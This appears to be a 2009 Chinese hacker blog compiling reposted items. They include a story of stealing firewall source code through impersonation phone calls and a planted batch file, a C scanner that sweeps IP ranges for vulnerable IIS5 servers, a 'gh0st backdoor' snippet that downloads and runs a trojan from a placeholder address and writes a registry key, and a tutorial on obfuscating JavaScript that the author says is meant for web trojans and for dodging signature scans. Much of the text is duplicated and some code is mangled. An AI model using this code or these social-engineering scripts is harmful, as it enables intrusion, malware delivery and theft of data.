劉漂陽(以下簡稱劉):「嗯,我是北京亞太機電股份有限公司採購部經理劉漂陽,我們公司需要500份防火牆軟件產品,我參考了網上的防火牆橫向評測,再三考慮後決定選擇你們的產品,現在我想知道你們給我的價格是否令人滿意。」
恆:「劉經理,我們的防火牆有三種不同的版本,分別為個人版、專業版和企業版。如果你選擇企業版,它的單價是88元,總價為4.4萬;如果你批發購買、那麼價格相對優惠,僅3.2萬。」
劉:「嗯,沒有高於我們公司原始估價,不過我們公司網絡環境相當複雜,你們公司是否可以定製一套,實現封堵公司員工聊天與下載的功能?」
恆:「這個……請讓我問問軟件開發部,請稍等。」
劉:「好的」
…………
恆:「久等了,技術員說了,防火牆自帶了過濾功能,只要過濾到相應端口就可以了。」
劉:「原來是這樣,我沒有問題了,但我們公司網絡管理員建議我把有關內部網絡的文檔發給你,讓你們技術員檢查防火牆的可行性。你有電腦嗎?我想現在就傳送給你,稍後我還有一個會議急需參加。」
恆:「有的,我的電子郵件是wenyu014@163.com,你現在就發過來?」
劉:「是的,等一下……(這位「劉漂陽」將一個文件夾與一個批處理文件打包並用郵箱發到指定的郵件
地址)我發過去了,一個壓縮包,你解壓到D盤,要放在D盤才能打開。」
恆:「嗯,解壓了,是那個「北京亞太機電有點股份公司局域網環境.bat」文件嗎?」
劉:「對,你可以查看下,看看是否可以打開,可以打開的話,你就發一份給你們技術員」
恆:「可以打開,只閃了一個黑窗口」
劉:「好的,三天後我給你答覆」
恆:「劉經理,再見!」
計劃很順利,劉昉成功利用社會工程學在恆天公司開啟了一個共享文件夾,文件夾以壓縮包的「WALL」命名,裡面包含了一個文件夾和批處理。不過批處理文件早已自刪除了,其作用就是開啟共享文件夾,並將另一個文件夾中的DOC文檔複製到當前目錄。
二、合作者的陰謀
防火牆源代碼是軟件公司的命根子,只有軟件開發人員才得以接觸,但劉昉對這些技術人員一無所知,他需要弄到一些基本信息,以及找一個可信的裡有。這次他以百度市場拓展部經理丁楠的身份撥通了恆天公司市場部的電話。
市場部:「您好,恆天公司市場部。」
丁楠:「我是百度拓展部經理丁楠,貴公司有合作的意向嗎?」
市場部:「百度?是在北京市北四環路58號理想大廈嗎?全球最大的搜索引擎?」
丁楠:「是的,我們公司計劃整合國內多家尖端軟件產品進行合作,以提升企業形象與影響力,目前國內有三家上市軟件公司參與,不知恆天公司……」
市場部:「我們恆天企業才運營半年,在業界也暫無廣泛的知名度,能與貴公司合作再好不過了,但合作的決定權不在我們市場部,這個需要內部討論才能再作商議。」
丁楠:「這樣吧,我給你們恆天公司5天的考慮時間在做決定,如何?」
市場部:「可以!可以!」
丁楠:「嗯,你是市場部的負責人嗎?」
市場部:「是的,市場部,車仁表」
丁楠:「那麼,車經理,我想瞭解恆天公司的大致情況,雖然我們李彥宏董事長早有此計劃,但我需要一些資料說服部分反對的股東,因此,麻煩提供你們公司整體 運營情況,如季度的銷售額,還有軟件開發人員的資料。關於合作事宜百度公司將於明早八點半開股東大會對此作出決定。」
市場部:「這麼快?好的,資料我如何發給你呢?」
丁楠:「發到我的郵箱吧「by1943@qq.com」,最後,我們明早9點聯繫你,如何?」
市場部:「可以的,謝謝!」
大概半小時後,劉昉很順利的拿到一份清晰的員工表格,看上去,資料來源於人力資源部。劉昉很確定,恆天公司的市場負責人一定被「合作」沖昏了大腦,竟然把公司財務損益都發過來了。
三、消失的100萬源代碼
很自然,劉昉花了幾分鐘社工到信息後,打算冒稱恆天公司市場部另一位負責人王坤,並撥通了恆天公司軟件研發部技術人員劉剛的電話。
劉剛:「哪位?」
王坤:「是軟件開發部的劉剛吧?我是市場部負責人王坤,你不久前知道了公司將與百度合作的情況吧?」
劉剛:「好像是吧,我不確定。」
王坤:「嗯,百度要投資我們,你所在的服務器工作站打不打算置換?有這個打算的話,我跟財務部小王交涉下」
劉剛:「換吧!換吧!最近機箱動不動就有怪聲(劉剛對工作站的機子似乎有極度的不滿,迫於企業資金緊張,他也就沒提起,現在是個好機會)」
王坤:「很好,你把源代碼放到咱們內網做個備份,以免丟失了。嗯,我特意在銷售部的機子開了個共享,你把源碼放上去,下午6點新機器從電腦城元送過來,機器裝好後在刪掉源碼。」
劉剛:「好的,但是源碼會不會洩漏出去了?(劉剛有些擔心。)」
王坤:「沒事,現在4點,再過兩小時你就刪掉,而且我們機子都在內網,何況不是還有咱的防火牆嗎?少擔心了,你要對你的防火牆信任!」
劉剛:「OK!知道了!」 劉剛掛掉了電話。
緊接著,劉昉再次撥通恆天公司銷售部的電話……
銷售部:「劉經理?」(一看到號碼,一下就認出來了。)
劉漂陽:「嗯,我是採購部的劉經理,我在途中想到一件事,所以打電話問一下。」
銷售部:「請說。」
劉:「我似乎發錯文件了,除了發給你網絡環境.bat之外,我還發送了其他文件,你檢查一下有沒有多餘的文件?」
銷售部:「好的,我查查,在D盤的WALL文件夾對吧?」
劉:「對」
銷售部:「嗯,在WALL文件夾裡的另一個文件夾包含了一些打不開的文件,你指的是這些嗎?」
劉:「對,能發給我嗎?那是我其他的採購項目表,需要相應的軟件才能打開。(劉經理很誠懇的解釋。)要是項目表丟了,我的工作也就丟了。」
銷售部:「這樣啊,不要緊,我馬上打包發到你郵箱裡。(接著是鍵盤的敲打聲……)我發過去了,劉經理,您打開郵箱看一下」
劉:「收到了,謝謝你了!」
銷售部:「嗯,沒問題的話我先掛了,劉先生,別忘了防火牆的採購!」
劉:「好的,再見!」
就這樣,撥打三次電話的劉昉搞定了防火牆源代碼,不過為什麼銷售部的人說打不開那些文件呢?很簡單,她沒有安裝編程軟件,所以打不開。雖有,劉昉用網名 「神秘小強」將全部的防火牆源代碼公佈在很多黑客論壇……第二天,門戶站報導了這一代碼洩漏事件,網警對此束手無策。
註: 本文轉載自網路 非原創
轉載自 YeZi's Blog 原文2009年10月15日 星期四
2009年10月13日 星期二
NIS2010德國免費6個月KEY申請
https://emea.norton.com/trialware/2009/avfbild/
申請的是NIS2009的KEY,但是NIS2010也可以使用!
德國活動,手腳要快!
1.填信箱 旁邊那欄也隨便挑個
2.下面2個打勾
3.提交
4.收信>>點信箱中的連結
5.在收到6個月(180天)的KEY
可下載安裝繁體中文版
然後套用半年KEY
Norton Internet Security 2010
17.0.0.136 繁体中文正式版官方下載
http://spftrl.digitalriver.com/pub/symantec/tbyb/NAM/NIS10TBCH.exe
17.0.0.136 英文正式版官方下載
http://spftrl.digitalriver.com/pub/symantec/tbyb/NAM/NIS10TBEN.exe
此防毒軟體相關資訊請參考:
台灣諾頓 http://www.symantec.com/zh/tw/norton/internet-security
申請的是NIS2009的KEY,但是NIS2010也可以使用!
德國活動,手腳要快!
1.填信箱 旁邊那欄也隨便挑個
2.下面2個打勾
3.提交
4.收信>>點信箱中的連結
5.在收到6個月(180天)的KEY
可下載安裝繁體中文版
然後套用半年KEY
Norton Internet Security 2010
17.0.0.136 繁体中文正式版官方下載
http://spftrl.digitalriver.com/pub/symantec/tbyb/NAM/NIS10TBCH.exe
17.0.0.136 英文正式版官方下載
http://spftrl.digitalriver.com/pub/symantec/tbyb/NAM/NIS10TBEN.exe
此防毒軟體相關資訊請參考:
台灣諾頓 http://www.symantec.com/zh/tw/norton/internet-security
註: 本文轉載自網路 非原創
轉載自 PTT-AntiVirus by EVA2009年10月12日 星期一
New Comodo scored perfectly!
- 2009-10-10: A new response from Comodo Security Solutions, Inc., the vendor of Comodo Internet Security, has been added.
- 2009-10-10: A single product update:
- Comodo Internet Security 3.12.111745.560
The great results of the challenge leading products in the last tests force us to implement new tests to our testing suite. We are going to cover even more areas of Windows security with many new tests in the following months in order to raise the bar just a bit again.
註: 本文轉載自網路 非原創轉載自 Matousec.com
2009年10月10日 星期六
一個包含詳細註釋的掃瞄器C源代碼
程式碼
#include <stdio.h> #include <winsock2.h> #include <time.h> #define iPort 80//目標Web Server端口 .#define szSign "500 13\r\nServer: Microsoft-IIS/5.0"//根據此標誌來檢查目標是否有漏洞 #pragma comment(lib,"ws2_32.lib") /////////////////////////////////////////////////////////////////////////// // //定義&初始化全局變量 char *SendBuff="GET /NULL.printer\n",//發送的請求buff CurrentTarget[52]={0},//存放最後一個線程將掃瞄的目標 turn[4][2]={"-","\\","|","/"};//顯示進度時的字符 int SendBuffLen=strlen(SendBuff),//發送的buff長度 iConnTimeout,//TCP Connect TimeOut ii=0,//掃瞄進度 iTotal;//服務器總數 HANDLE hSemaphore=NULL,//信標內核對象句柄,用來控制線程數量 hStdout;//console標準輸出句柄,做進度顯示的時候用的 struct timeval timeout;//連接、發送和接收的超時值 DWORD SleepTime;//每個一個線程後等待的時間 /* SleepTime值根據用戶輸入的線程數量[ThreadNum]和TCP ConnectTimeOut[CONNTIMEO]來計算。確保在CONNTIMEO時間左右開ThreadNum個線程。這樣在CONNTIMEO時間後,所開的線程開始陸續超時退出,可以繼續穩定的開線程,可以有效的保證同時有ThreadNum個線程在運行。 */ /////////////////////////////////////////////////////////////////////////// void ShowError(char *);//顯示出錯信息函數 BOOL ResetCursor(void);//重置光標位置,線程輸出的時候調用的 DWORD WINAPI ShowProInfo(LPVOID);//顯示進度信息 DWORD WINAPI scan(LPVOID);//掃瞄函數 void usage(char *);//幫助函數 /////////////////////////////////////////////////////////////////////////// int main(int argc,char **argv) { HANDLE hThread=NULL;//線程句柄 DWORD dwThreadID;//線程ID struct sockaddr_in sa; int i, MaxThread;//最大線程數量 WSADATA wsd; long PreviousCount; clock_t start,end;//程序運行的起始和結束時間 double duration; //檢查用戶輸入參數 if(argc!=5) { usage(argv[0]); return 1; } //get target range int StartNet=inet_addr(argv[1]); int StopNet=inet_addr(argv[2]); int StartHost=ntohl(StartNet); int StopHost=ntohl(StopNet); //取得線程數量 MaxThread=atoi(argv[3]); //取得conn超時時間 iConnTimeout=atoi(argv[4]); //檢查參數合法性 if((iConnTimeout>6) || (iConnTimeout<2) || (MaxThread<1) || (MaxThread>500) || (StopHost<StartHost)) { usage(argv[0]); return 1; } //計算時間 SleepTime=1000*iConnTimeout/MaxThread; //設置連接超時值 timeout.tv_sec = iConnTimeout; timeout.tv_usec =0; __try { //開始計時 start=clock(); //加載winsock庫 if (WSAStartup(MAKEWORD(1,1), &wsd) != 0) { ShowError("WSAStartup"); __leave; } //創建信標內核對象句柄 hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL); if(hSemaphore==NULL) { ShowError("CreateSemaphore"); __leave; } //取得console標準輸出句柄 hStdout=GetStdHandle(STD_OUTPUT_HANDLE); if(hStdout==INVALID_HANDLE_VALUE) { ShowError("GetStdHandle"); __leave; } //設置目標總數 iTotal=StopHost-StartHost; //創建進度顯示線程 hThread=CreateThread(NULL,0,ShowProInfo,NULL,0,&dwThreadID); if(hThread==NULL) { ShowError("1 CreateThread"); __leave; } //關閉句柄 CloseHandle(hThread); //循環創建掃瞄線程 for(i=StartHost;i<=StopHost;i++) { //等待信標內核對象通知 WaitForSingleObject(hSemaphore,INFINITE); //create thread to scan hThread=CreateThread(NULL,0,scan,(LPVOID)i,0,&dwThreadID); if(hThread==NULL) { ShowError("2 CreateThread"); break; } //進度自加1 ii++; //重設最後一個線程掃瞄的目標 sa.sin_addr.s_addr=htonl(i); strncpy(CurrentTarget,inet_ntoa(sa.sin_addr),sizeof(CurrentTarget)); //休息一會兒 ) Sleep(SleepTime); //關閉線程句柄 CloseHandle(hThread); } //等待所有線程結束 while(1) { WaitForSingleObject(hSemaphore,INFINITE); if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount)) { ShowError("main() ReleaseSemaphore"); Sleep(5000); break; } if(PreviousCount==(MaxThread-1)) { printf("\nAll done."); break; } Sleep(500); } }//end of try //搞定,清場,收工 __finally { //計時結束 end=clock(); //轉換時間格式 duration = (double)(end - start) / CLOCKS_PER_SEC; //顯示所用時間 printf("\n\nComplete.Scan %d targets use %2.1f seconds.Speed %0.3g/s\n",iTotal,duration,iTotal/duration); //關閉句柄 CloseHandle(hStdout); CloseHandle(hSemaphore); WSACleanup(); } return 0; } /////////////////////////////////////////////////////////////////////////// // //回顯錯誤信息函數 // void ShowError(char *msg) { MessageBox(NULL,msg,"ERROR",0); //printf("\n%s failed:%d",GetLastError()); } ////////////////////////////////////////////////////////////////////////// // //重置光標位置函數,以便掃瞄線程輸出結果 // BOOL ResetCursor() { CONSOLE_SCREEN_BUFFER_INFO ConsoleScreenBufferInfo; //取得當前光標位置 if(!GetConsoleScreenBufferInfo(hStdout,&ConsoleScreenBufferInfo)) { ShowError("GetConsoleScreenBufferInfo"); return FALSE; } //設置光標X坐標為0 ConsoleScreenBufferInfo.dwCursorPosition.X=0; //設置當前光標位置 SetConsoleCursorPosition(hStdout,ConsoleScreenBufferInfo.dwCursorPosition); return TRUE; } /////////////////////////////////////////////////////////////////////////// // //顯示進度信息函數 // DWORD WINAPI ShowProInfo(LPVOID lp) { int j,k; CONSOLE_SCREEN_BUFFER_INFO ConsoleScreenBufferInfo; float m; for(j=0;ii<iTotal;j++) { //休息一會兒 )) Sleep(SleepTime); //取得當前光標位置 if(!GetConsoleScreenBufferInfo(hStdout,&ConsoleScreenBufferInfo)) { ShowError("GetConsoleScreenBufferInfo"); return 1; } //設置百分比進度顯示的X坐標 ConsoleScreenBufferInfo.dwCursorPosition.X=0; //設置當前光標位置 SetConsoleCursorPosition(hStdout,ConsoleScreenBufferInfo.dwCursorPosition); //已經完成的百分比 m=(ii+1)*100.00/iTotal; //顯示進度 if(ii==iTotal) { printf("******** 100%% Wait %d seconds to exit ******** \n",iConnTimeout); break; } else { k=j%4; printf("%-15s %s [%d/%d] %s %%%0.3g",CurrentTarget,turn[k],ii,iTotal,turn[k],m); } }//end of for return 0; } /////////////////////////////////////////////////////////////////////////// // //掃瞄函數 // DWORD WINAPI scan(LPVOID lp) { int i=(int)lp,iErr; struct sockaddr_in server; SOCKET s=INVALID_SOCKET; char RecvBuff[1024]={0},*ptr; int RecvBuffLen=sizeof(RecvBuff); u_long ul=1;//初始化為為非0值 fd_set r,w; //create socket s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(s==INVALID_SOCKET) { printf("\nCreate socket failed:%d",GetLastError()); ExitProcess(1); } //fill the addr struct server.sin_family=AF_INET; server.sin_port=htons(iPort); server.sin_addr.S_un.S_addr=htonl(i); __try { //設置socket為非鎖定模式,ul為0值的話,那麼soocket將被設置為鎖定模式 iErr=ioctlsocket(s,FIONBIO,(unsigned long*)&ul); if(iErr==SOCKET_ERROR ) { ResetCursor(); ShowError("ioctlsocket"); ExitProcess(1); } //printf("\n%X ioctl ok.strat conn",i); //connect to target connect(s,(struct sockaddr *)&server,sizeof(server)); //printf("\n%X conn return,start select w",i); //設置select參數 FD_ZERO(&w); FD_SET(s, &w); //等待connect成功&socket可寫 iErr=select(0, 0, &w, 0, &timeout); //printf("\n%X select w return %d",i,iErr); //等待返回後,socket仍不可寫則退出 if((iErr==SOCKET_ERROR) || (iErr==0)) { //printf("\n%X select return w err,exit",i); __leave; } //socket可寫則繼續 else { //send buff to target //printf("\n%X send",i); iErr=send(s,SendBuff,SendBuffLen,0); //printf("\n%X send return",i); if(iErr==SOCKET_ERROR) __leave; } //等待socket可讀 FD_ZERO(&r); FD_SET(s, &r); //printf("\n%X start select r",i); iErr=select(0, &r, 0, 0, &timeout); //printf("\n%X select r return %d",i,iErr); if((iErr==SOCKET_ERROR) || (iErr==0)) { //printf("\n%X select r err,exit",i); __leave; } else { //recv buff from target //printf("\n%X start recv",i); iErr=recv(s,RecvBuff,RecvBuffLen,0); //printf("\n%X recv ret",i); if(iErr==SOCKET_ERROR) __leave; } //verify buff ptr=strstr(RecvBuff,szSign); if(ptr!=NULL) { //線程輸出前要先調用ResetCursor函數 ResetCursor(); //輸出信息後務必加一個以上換行符號,輸出前請別加換行符號,以免顯示混亂 printf("[%-15s] has .printer mapped. \n",inet_ntoa(server.sin_addr)); } } __finally { if(!ReleaseSemaphore(hSemaphore,1,NULL)) ShowError("thread ReleaseSemaphore failed"); closesocket(s); } return 0; } /////////////////////////////////////////////////////////////////////////// void usage(char *proname) { printf("\n%s v0.1 only can find IIS5 .Printer mapped" "\nPower by ey4s<[email]ey4s@21cn.com[/email]> 2001.5.20" "\nhttp://www.patching.net" "\n\nUsage:%s <StartIP> <EndIP> <ThreadNum> <CONNTIMEO>" "\n\nNotice" "\n StartIP StopIP ==>Don『t forgot StopIP must large than StartIP " "\n ThreadNum ==>Thread number,please input between 1-500" "\n CONNTIMEO ==>TCP connect timeout,please input between 2-6" "\n\nExample" "\n %s 192.168.0.0 192.168.255.255 200 2",proname,proname,proname); }
註: 本文轉載自網路 非原創
轉載自 ey4s@21cn.comgh0st加後門方法
程式代碼為C
#include<windows.h> #include<urlmon.h> //這個可以不要 #include<process.h> //這個可以不要 #include<Shellapi.h> //這個是對ShellExecute的定義 #pragma comment (lib,"Urlmon.lib") //這個也可以不要,有DLL可以用 /* step1. 下載程序 step2. 如果重開機 以上運行 */ //----------step 1------------- int main(){ //下載到C:\test.exe URLDownloadToFile(NULL,"木馬地址","C:\test.exe",0,NULL); //執行test.exe ShellExecute(0,"open","c:\test.exe",NULL,NULL,SW_SHOW); return 0; } //----------step 2------------- HKEY hKey; DWORD dw; DWORD dwData = 0; if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\tw67waa",0L,KEY_ALL_ACCESS,&hKey) != ERROR_SUCCESS) //如果存在 就執行下面代碼 { //RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\tttjgf",&hKey); RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\tw67waa",0L,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dw); //RegSetValueEx(hKey, "hello", 0, REG_DWORD, (LPBYTE) &dwData,sizeof(DWORD)); //file(); } else{ //file(); }
註: 本文轉載自網路 非原創
轉載自 邪惡八進制信息安全團隊
2009年10月9日 星期五
HTML之七種加密方式
本文一共介紹了七種方法:
一:最簡單的加密解密
二:轉義字符""的妙用
三:使用Microsoft出品的腳本編碼器Script Encoder來進行編碼 (自創簡單解碼)
四:任意添加NUL空字符(十六進制00H) (自創)
五:無用內容混亂以及換行空格TAB大法
六:自寫解密函數法
七:錯誤的利用 (自創)
在做網頁時(其實是網頁木馬呵呵),最讓人煩惱的是自己辛辛苦苦寫出來的客戶端IE運行的JAVASCRIPT代碼常常被別人輕易的拷貝,實在讓自己的心裡有點不是滋味,要知道自己寫點東西也挺累的......^*^
但我們也應該清楚地認識到因為JAVASCRIPT代碼是在IE中解釋執行,要想絕對的保密是不可能的,我們要做的就是儘可能的增大拷貝者複製的難度,讓他知難而退(但願~!~),下面我結合自己這幾年來的實踐,及個人研究的心得,和大家一起來探討一下網頁中JAVASCRIPT代碼的加密解密技術。
以加密下面的JAVASCRIPT代碼為例:
以下是代碼片段:
一:最簡單的加密解密
大家對於JAVASCRIPT函數escape()和unescape()想必是比較瞭解啦(很多網頁加密在用它們),分別是編碼和解碼字符串,比如例子代碼用escape()函數加密後變為如下格式:
以下是代碼片段:
alert%28%22%u9ED1%u5BA2%u9632%u7EBF%22%29%3B
如何?還看的懂嗎?當然其中的ASCII字符"alert"並沒有被加密,如果願意我們可以寫點JAVASCRIPT代碼重新把它加密如下:
以下是代碼片段:
%61%6C%65%72%74%28%22%u9ED1%u5BA2%u9632%u7EBF%22%29%3B
呵呵!如何?這次是完全都加密了!
當然,這樣加密後的代碼是不能直接運行的,幸好還有eval(codeString)可用,這個函數的作用就是檢查JavaScript代碼並執行,必選項 codeString 參數是包含有效 JavaScript 代碼的字符串值,加上上面的解碼unescape(),加密後的結果如下:
以下是代碼片段:
二:轉義字符""的妙用
大家可能對轉義字符""不太熟悉,但對於JavaScript提供了一些特殊字符如:n (換行)、 r (回車)、' (單引號)等應該是有所瞭解的吧?其實""後面還可以跟八進制或十六進制的數字,如字符"a"則可以表示為:"141"或"x61"(注意是小寫字符"x"),至於雙字節字符如漢字"黑"則僅能用十六進製表示為"u9ED1"(注意是小寫字符"u"),其中字符"u"表示是雙字節字符,根據這個原理例子代碼則可以表示為:
八進制轉義字符串如下:
以下是代碼片段:
十六進制轉義字符串如下:
以下是代碼片段:
這次沒有瞭解碼函數,因為JavaScript執行時會自行轉換,同樣解碼也是很簡單如下:
以下是代碼片段:
三:使用Microsoft出品的腳本編碼器Script Encoder來進行編碼
工具的使用就不多介紹啦!我是直接使用JavaScript調用控件Scripting.Encoder完成的編碼!代碼如下:
以下是代碼片段:
編碼後的結果如下:
以下是代碼片段:
夠難看懂得吧?但相應的解密工具早已出來,而且連解密網頁都有!因為其解密網頁代碼過多,我就不多說拉!給大家介紹一下我獨創的解密代碼,如下:
以下是代碼片段:
咋樣?夠簡單吧?它是原理是:編碼後的代碼運行前IE會先對其進行解碼,如果我們先把加密的代碼放入一個自定義函數如上面的decode()中,然後對自定義函數decode調用toString()方法,得到的將是解碼後的代碼!
如果你覺得這樣編碼得到的代碼LANGUAGE屬性是JScript.Encode,很容易讓人識破,那麼還有一個幾乎不為人知的window對象的方法execScript(),其原形為:
window.execScript( sExpression, sLanguage )
參數:
sExpression: 必選項。字符串(String)。要被執行的代碼。
sLanguage : 必選項。字符串(String)。指定執行的代碼的語言。默認值為 Microsoft JScript
使用時,前面的"window"可以省略不寫!
利用它我們可以很好的運行編碼後的JavaScript代碼,如下:
以下是代碼片段:
四:任意添加NUL空字符(十六進制00H)
一次偶然的實驗,使我發現在HTML網頁中任意位置添加任意個數的"空字符",IE照樣會正常顯示其中的內容,並正常執行其中的JavaScript 代碼,而添加的"空字符"我們在用一般的編輯器查看時,會顯示形如空格或黑塊,使得原碼很難看懂,如用記事本查看則"空字符"會變成"空格",利用這個原理加密結果如下:(其中顯示的"空格"代表"空字符")
以下是代碼片段:
如何?是不是顯得亂七八糟的?如果不知道方法的人很難想到要去掉裡面的"空字符"(00H)的!
五:無用內容混亂以及換行空格TAB大法
在JAVASCRIPT代碼中我們可以加入大量的無用字符串或數字,以及無用代碼和註釋內容等等,使真正的有用代碼埋沒在其中,並把有用的代碼中能加入換行、空格、TAB的地方加入大量換行、空格、TAB,並可以把正常的字符串用""來進行換行,這樣就會使得代碼難以看懂!如我加密後的形式如下:
以下是代碼片段:
六:自寫解密函數法
這個方法和一、二差不多,只不過是自己寫個函數對代碼進行解密,很多VBS病毒使用這種方法對自身進行加密,來防止特徵碼掃瞄!下面是我寫的一個簡單的加密解密函數,
加密代碼如下(詳細參照文件"加密.htm"):
以下是代碼片段:
運行得到加密結果為:o%CD%D1%D7%E6%9CJ%u9EF3%uFA73%uF1D4%u14F1%u7EE1Kd
相應的加密後解密的代碼如下:
以下是代碼片段:
利用try{}catch(e){}結構對代碼進行測試解密,雖然這個想法很好(呵呵,誇誇自己),因為實用性不大,我僅給個例子
以下是代碼片段:
一:最簡單的加密解密
二:轉義字符""的妙用
三:使用Microsoft出品的腳本編碼器Script Encoder來進行編碼 (自創簡單解碼)
四:任意添加NUL空字符(十六進制00H) (自創)
五:無用內容混亂以及換行空格TAB大法
六:自寫解密函數法
七:錯誤的利用 (自創)
在做網頁時(其實是網頁木馬呵呵),最讓人煩惱的是自己辛辛苦苦寫出來的客戶端IE運行的JAVASCRIPT代碼常常被別人輕易的拷貝,實在讓自己的心裡有點不是滋味,要知道自己寫點東西也挺累的......^*^
但我們也應該清楚地認識到因為JAVASCRIPT代碼是在IE中解釋執行,要想絕對的保密是不可能的,我們要做的就是儘可能的增大拷貝者複製的難度,讓他知難而退(但願~!~),下面我結合自己這幾年來的實踐,及個人研究的心得,和大家一起來探討一下網頁中JAVASCRIPT代碼的加密解密技術。
以加密下面的JAVASCRIPT代碼為例:
以下是代碼片段:
<SCRIPT LANGUAGE="JavaScript"> alert("黑客防線"); </SCRIPT>
一:最簡單的加密解密
大家對於JAVASCRIPT函數escape()和unescape()想必是比較瞭解啦(很多網頁加密在用它們),分別是編碼和解碼字符串,比如例子代碼用escape()函數加密後變為如下格式:
以下是代碼片段:
alert%28%22%u9ED1%u5BA2%u9632%u7EBF%22%29%3B
如何?還看的懂嗎?當然其中的ASCII字符"alert"並沒有被加密,如果願意我們可以寫點JAVASCRIPT代碼重新把它加密如下:
以下是代碼片段:
%61%6C%65%72%74%28%22%u9ED1%u5BA2%u9632%u7EBF%22%29%3B
呵呵!如何?這次是完全都加密了!
當然,這樣加密後的代碼是不能直接運行的,幸好還有eval(codeString)可用,這個函數的作用就是檢查JavaScript代碼並執行,必選項 codeString 參數是包含有效 JavaScript 代碼的字符串值,加上上面的解碼unescape(),加密後的結果如下:
以下是代碼片段:
<SCRIPT LANGUAGE="JavaScript"> var code=unescape("%61%6C%65%72%74%28%22%u9ED1%u5BA2%u9632%u7EBF%22%29%3B"); eval(code) </SCRIPT>是不是很簡單?不要高興,解密也就同樣的簡單,解密代碼都擺給別人啦(unescape())!呵呵
二:轉義字符""的妙用
大家可能對轉義字符""不太熟悉,但對於JavaScript提供了一些特殊字符如:n (換行)、 r (回車)、' (單引號)等應該是有所瞭解的吧?其實""後面還可以跟八進制或十六進制的數字,如字符"a"則可以表示為:"141"或"x61"(注意是小寫字符"x"),至於雙字節字符如漢字"黑"則僅能用十六進製表示為"u9ED1"(注意是小寫字符"u"),其中字符"u"表示是雙字節字符,根據這個原理例子代碼則可以表示為:
八進制轉義字符串如下:
以下是代碼片段:
<SCRIPT LANGUAGE="JavaScript"> eval("1411541451621645042u9ED1u5BA2u9632u7EBF425173") </SCRIPT>
十六進制轉義字符串如下:
以下是代碼片段:
<SCRIPT LANGUAGE="JavaScript"> eval("x61x6Cx65x72x74x28x22u9ED1u5BA2u9632u7EBFx22x29x3B") </SCRIPT>
這次沒有瞭解碼函數,因為JavaScript執行時會自行轉換,同樣解碼也是很簡單如下:
以下是代碼片段:
<SCRIPT LANGUAGE="JavaScript"> alert("x61x6Cx65x72x74x28x22u9ED1u5BA2u9632u7EBFx22x29x3B") </SCRIPT>就會彈出對話框告訴你解密後的結果!
三:使用Microsoft出品的腳本編碼器Script Encoder來進行編碼
工具的使用就不多介紹啦!我是直接使用JavaScript調用控件Scripting.Encoder完成的編碼!代碼如下:
以下是代碼片段:
<SCRIPT LANGUAGE="JavaScript"> var Senc=new ActiveXObject("Scripting.Encoder"); var code='<SCRIPT LANGUAGE="JavaScript">rnalert("黑客防線");rn</SCRIPT>'; var Encode=Senc.EncodeScriptFile(".htm",code,0,""); alert(Encode); </SCRIPT>
編碼後的結果如下:
以下是代碼片段:
<SCRIPT LANGUAGE="JScript.Encode">#@~^FgAAAA==@#@&lsDD`J黑客防線r#p@#@&FgMAAA==^#~@</SCRIPT>
夠難看懂得吧?但相應的解密工具早已出來,而且連解密網頁都有!因為其解密網頁代碼過多,我就不多說拉!給大家介紹一下我獨創的解密代碼,如下:
以下是代碼片段:
<SCRIPT LANGUAGE="JScript.Encode"> function decode() alert(decode.toString()); </SCRIPT>
咋樣?夠簡單吧?它是原理是:編碼後的代碼運行前IE會先對其進行解碼,如果我們先把加密的代碼放入一個自定義函數如上面的decode()中,然後對自定義函數decode調用toString()方法,得到的將是解碼後的代碼!
如果你覺得這樣編碼得到的代碼LANGUAGE屬性是JScript.Encode,很容易讓人識破,那麼還有一個幾乎不為人知的window對象的方法execScript(),其原形為:
window.execScript( sExpression, sLanguage )
參數:
sExpression: 必選項。字符串(String)。要被執行的代碼。
sLanguage : 必選項。字符串(String)。指定執行的代碼的語言。默認值為 Microsoft JScript
使用時,前面的"window"可以省略不寫!
利用它我們可以很好的運行編碼後的JavaScript代碼,如下:
以下是代碼片段:
<SCRIPT LANGUAGE="JavaScript"> execScript("#@~^FgAAAA==@#@&lsDD`J黑客防線r#p@#@&FgMAAA==^#~@","JScript.Encode") </SCRIPT>你可以利用方法二對其中的""號內的字符串再進行編碼,使得"JScript.Encode"以及編碼特徵碼"#@~^"不出現,效果會更好!
四:任意添加NUL空字符(十六進制00H)
一次偶然的實驗,使我發現在HTML網頁中任意位置添加任意個數的"空字符",IE照樣會正常顯示其中的內容,並正常執行其中的JavaScript 代碼,而添加的"空字符"我們在用一般的編輯器查看時,會顯示形如空格或黑塊,使得原碼很難看懂,如用記事本查看則"空字符"會變成"空格",利用這個原理加密結果如下:(其中顯示的"空格"代表"空字符")
以下是代碼片段:
<SCRIPT Language = "JavaScript"> alert("黑客防線"); </SCRIPT>
如何?是不是顯得亂七八糟的?如果不知道方法的人很難想到要去掉裡面的"空字符"(00H)的!
五:無用內容混亂以及換行空格TAB大法
在JAVASCRIPT代碼中我們可以加入大量的無用字符串或數字,以及無用代碼和註釋內容等等,使真正的有用代碼埋沒在其中,並把有用的代碼中能加入換行、空格、TAB的地方加入大量換行、空格、TAB,並可以把正常的字符串用""來進行換行,這樣就會使得代碼難以看懂!如我加密後的形式如下:
以下是代碼片段:
<SCRIPT LANGUAGE="JavaScript"> "xajgxsadffgds";1234567890 625623216;var $=0;alert//@$%%&*()(&(^%^ //cctv function// (//hhsaasajx xc /* asjgdsgu*/ "黑客防線"//ashjgfgf /* @#%$^&%$96667r45fggbhytjty */ //window ) ;"#@$#%@#432hu";212351436 </SCRIPT>至少如果我看到這樣的代碼是不會有心思去分析它的,你哪?
六:自寫解密函數法
這個方法和一、二差不多,只不過是自己寫個函數對代碼進行解密,很多VBS病毒使用這種方法對自身進行加密,來防止特徵碼掃瞄!下面是我寫的一個簡單的加密解密函數,
加密代碼如下(詳細參照文件"加密.htm"):
以下是代碼片段:
<SCRIPT LANGUAGE="JavaScript"> function compile(code) { var c=String.fromCharCode(code.charCodeAt(0)+code.length); for(var i=1;i<code.length;i++){ c+=String.fromCharCode(code.charCodeAt(i)+code.charCodeAt(i-1)); } alert(escape(c)); } compile('alert("黑客防線");') </SCRIPT>
